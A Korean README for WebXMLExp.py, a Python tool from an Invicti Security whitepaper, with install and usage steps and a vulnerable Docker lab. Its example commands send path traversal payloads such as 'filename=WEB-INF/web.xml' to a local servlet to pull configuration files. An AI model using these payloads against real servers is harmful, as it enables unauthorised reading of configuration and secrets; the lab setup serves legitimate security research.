
Java 웹 애플리케이션에서 경로 탐색(path traversal) 취약점 악용을 돕는 도구
Java 웹 애플리케이션에서 path traversal(경로 탐색) 취약점을 악용하는 데 도움이 되는 도구입니다.
이 도구는 Invicti Security 백서 Java 웹 애플리케이션의 path traversal 취약점 악용에서 참조됩니다.
이 도구에는 Python3가 필요합니다.
다음 명령을 실행하세요:
pip install -r requirements.txt
설치 후 다음과 같이 익스플로잇 URL을 제공하세요:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
결과(다운로드된 파일)는 results 폴더에서 확인할 수 있습니다.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
path traversal 취약점에 취약한 웹 애플리케이션이 docker 폴더에 제공됩니다.
시작하려면 docker 폴더로 이동한 후 다음을 실행하세요:
docker-compose up
애플리케이션은 **http://127.0.0.1:8082/vulnerable/**에서 접근할 수 있습니다.
path traversal 취약점을 악용하려면 다음 URL을 방문하세요: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml